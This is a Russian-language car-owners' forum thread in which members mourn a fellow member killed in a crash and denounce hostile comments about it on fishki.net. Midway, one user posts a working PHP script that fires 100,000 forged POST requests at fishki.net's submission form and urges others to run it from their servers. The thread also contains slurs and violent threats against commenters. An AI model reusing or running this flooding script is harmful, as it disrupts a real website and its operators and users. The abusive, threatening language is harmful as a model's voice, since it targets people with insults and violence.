Помощь - Поиск - Пользователи - Календарь
Полная версия этой страницы: webpark.ru СПАСИБО Вам...!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Mitsubishi Lancer Evolution - Форум владельцев > Тусовка > Курилка
Bergman
Администрации портала webpark.ru выражаем свою благодарность...

Sol - большое тебе человеческое СПАСИБО...

http://www.webpark.ru/comments.php?id=28542
Smoke
Жаль что только на фишках.нет сидят одни бесчеловечные пидорасы :evil:
Spirt
на похе.ру тоже удаляли сначала все оскорбительные каменты, а потом забили :(
Spitfire
Цитата(Smoke)
Жаль что только на фишках.нет сидят одни бесчеловечные пидорасы :evil:

Да мудачьё это безмозглое, забейте. Убогие уроды, которые в реальной жизни ничего из себя не представляют, зато в виртуале самовыражаются...
Bikk
На фишках просто завалил сегодня администрацию письмами и что... ноль реакции :x :x :x
cer.L.A.n
Все друг у друга копируют... На одном сайте написал, чтоб убрали все фотографии, а убрали только одну.. :evil: :evil: :evil: :evil:
Dan
Фишки раньше принадлежали Илье под ником [cut], он чел нормальный хоть и не сработались с ним, он бы убрал, сейчас фишки купили рбк, новости постит там админ ziza.ru.
hima
На Фишках такие коменты что в жар бросает....
guest
Эти уроды, что в комментах такие смелые - это люди, у которых нихуа нет в жизни, акромя возможности насрать кому то в душу....... не поплатившись за это.......... а сайты типа фишек делают деньги на этих повозках с дерьмом - 200000 просмотров - они любого из нас за такой контент в полуразложеном состоянии покажут..суки
простите за прямоту
MorliDots
Забить на ублюдков...больше никак выразиться не могут.... :(
З.Ы,Сорри вебпарку спасибо забыл сказать....спасибо.
alibaster
Да я ваще ненавижу интернет, если на то пошло- много в нем п...т, и все безвозмездно... В интернете отрываются только неудачники, нормальные люди умеют высказываться в реале! а в интернете вникать и понимать! Знайте одно- это неудачники и обращать внимание на них не стоит- хотя, да, понимаю, хочется всять кувалду и по рукам ипатуть, чтоб руки атрофировались, и в пасть врезать, чтоб она не открывалась... Я почитал их каменты, мне ваще х....о стало, такой человек погиб, а они суки такие- мол он плохой, а мы все хорошенькие недотроги!!! Ничё, сразу видно, у них нет друзей, как были у Тимура! Это отбросы жизни, это токсины, засоряющие окружающую среду, это не люди!!!
Zakk
Мужики, я тоже отписал на Фишки мессагу. Я надеюсь , что всё-таки администрация сайта поймёт и примет правильное решение. Я думаю, чем больше будет писем, тем больше шансов, что этот топик с Тимуром уберут со страницы.
Dan
Не хочется обсуждать причины такого поведения людей в связи с таким событием, но в кратце интеренет это срез общества, и то что люди высказывают в интернете, они так и думают в реале. Из этого следует очень грустный вывод о соостоянии всего общества в целом.
Pakrishka
Главная ошибка - это когда вы обращаете на этих "людей" внимание, им от этого лучше, а нам хуже, этим они и живут!Просто не реагируйте и они сами удавятся своим же поносом!!! :x
Gorich
Может не станем дальше продавливать эту тему?!Просто надо забить на этих уродов,не пользоватьс яих ресурсами и все такое?!
Мне например ,что там думает кучка чмошников..Мужики просто давайте помолчим,и не станем это обсуждать,по крайней мере пока!
Жизнь их вылечит!
Rudik
К сожалению не вылечит...таких душить надо
Bergman
Ну не знаю как выразить благодарность FISHKI.NET

...СПАСИБО, мы у вас в долгу...!!!

http://www.fishki.net/commentall.php?id=26851
Dan
Запустил у себя такой скриптик
Как сто тысяч мессаг получат может подумают головой
У кого есть возможность включайте на своих серверах
Код
<?

set_time_limit(0);

for($x=0;$x<100000;$x++){

echo $x."n";

$fp = fsockopen("fishki.net", 80, $errno, $errstr, 2);

if (!$fp) {

echo "$errstr ($errno)<br />n";

} else {

$out = "POST /newssend.php?add HTTP/1.1rn";

$out .= "Host: fishki.netrn";

$out .= "Connection: Closern";

$out .= "Referer: http://fishki.net/newssend.phprn";

$out .= "Content-Type: multipart/form-data; boundary=---------------------------131752666323133rn";

$out .= "Content-Length: 1474rnrn";

$out .= "-----------------------------131752666323133

Content-Disposition: form-data; name="name"

ccc

-----------------------------131752666323133

Content-Disposition: form-data; name="email"

nomail@serv.com

Content-Disposition: form-data; name="news"

UBERITE FOTOGRAFFI AVARII NA VERNANDSKOGO

Content-Disposition: form-data; name="youtube_url"

Content-Disposition: form-data; name="file1"; filename=""

Content-Type: application/octet-stream

Content-Disposition: form-data; name="file2"; filename=""

Content-Disposition: form-data; name="file3"; filename=""

Content-Disposition: form-data; name="file4"; filename=""

Content-Disposition: form-data; name="file5"; filename=""

Content-Disposition: form-data; name="verify"

6706bad9076e9a4123120bfe2af6e1cb

Content-Disposition: form-data; name="Submit"

A"i^a'a`a^e`o`u"

-----------------------------131752666323133--

";

//echo $out;

fwrite($fp, $out);

//while (!feof($fp)) {

//    echo fgets($fp, 128);

//}

fclose($fp);

}

}

?>
нахалёнка
Ребят, поберегите свои нервы... читать эти комменты - хуже некуда, мы всегда будем худшими из худших, потому что у нас есть то чего нет у них - свободы, машины и любви к движению. Они могут нас только осуждать... Давайте просто постораемся собраться с силами и просто не читать - мы же можем... те злорадствующие гады кто оставляют такие сообщения просто не сталкивались с таким горем.

Будем выше - не станем опускаться в ругань и биение головой об стену с доказыванием что мы правы.

Всем удачи и берегите себя.
Yan
8) Жизнь расставит все на свои места рано или поздно и они когда нибудь это поймут, но время уйдет и люди от них отвернуться. Очень жаль таких людей и их родителей, что они воспитали таких бездушных выродков. Они в этой жизни ничего не добились и вряд ли добьються, и поэтому им никак себя больше не выразить.
Бог им судья.
Главное что хороших людей все равно больше и мы вместе :twisted:
Bergman
я имел ввиду, что там все коментарии удалили модераторы...
за что им и спасибо...!!!
нахалёнка
К сожалению там уже и без тех комментов много написали.... и осталось много на других сайтах..., но не суди, да не судим будешь - скоро все забудут... только мы не забудем.
BMWoman
Лучше бы нашелся тот, кто видел из-за чего случилась авария!
Gorich
Олесь..Все в принципе более или менее понятно...И в протоколе будет скорее всего написано,что не справился с управлением!
На самом деле,скорее всего так и есть..То.что видел и слышал об этом,Тимур просто не смог в сложной ситуаци совладеть со "зверем"...Более того...В такой именно ситуации,при начале событий-никто не смог бы ее уже исправить!Не профи не чемпионы,никто!
Говорю про это,потаму что был там минут через 45 после аварии видел все следы,и говорят был сведетель на тот момент,который может и не видел сам момент столкновения,но четко слышал переключения с характерными для того авто выхлопами и взрывами!
Это собственно ответ из-за чего!Если еще чуть добавить,то в личку напиши,поробую точно объяснить!Думаю,что почти со 100 процентной точностью объясню!Если вопрос стоит ,из-за кого,то на него у меня нет ответа!
BMWoman
Что будет в протоколе - это вранье!!!
И все не понятно! Он не гонял в городе, он всех ругал за гонки на дорогах Москвы!!!!!!!!!!!!!
нахалёнка
Цитата(Beautiful Magic Woman)
Что будет в протоколе - это вранье!!!
И все не понятно! Он не гонял в городе, он всех ругал за гонки на дорогах Москвы!!!!!!!!!!!!!

да все знают что он не гонял в городе, и меня постоянно за это ругал, даже когда я раньше него куда-то приезжала.... не понятно что в том момент заставило или вынудило его так ехать....
BMWoman
Надо искать сведетелей....был день...пр-т Вернадского -это не пустыня!!!!!
нахалёнка
Цитата(Beautiful Magic Woman)
Надо искать сведетелей....был день...пр-т Вернадского -это не пустыня!!!!!

не найдем никого(((( да и зачем... что они могли видеть? что он пролетел мимо кого-то? камеры на Вернадке не пишущие.... к сожалению.... давайте не будем - все равно не узнаем истины...
BMWoman
Кто ищет, тот всегда найдет!
нахалёнка
ищем...
Maxel
на авто ру есть конфа по поиску людей
нахалёнка
Цитата(Maxel)
на авто ру есть конфа по поиску людей
авто ру было первым кто разместил фотки с аварией... там никто не находится, несколько раз пробовали, одни фантазеры...
MorliDots
Вроде, кто то видел как он с кем то гонял..или за кем то...но это через третьи руки инфа...я свои координаты этим людям с просьбой отписатьсяесли действительно видели оставил...
BMWoman
Надо собрать всю инфу....а специалисты решат, что есть истина!
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.
Форум IP.Board © 2001-2025 IPS, Inc.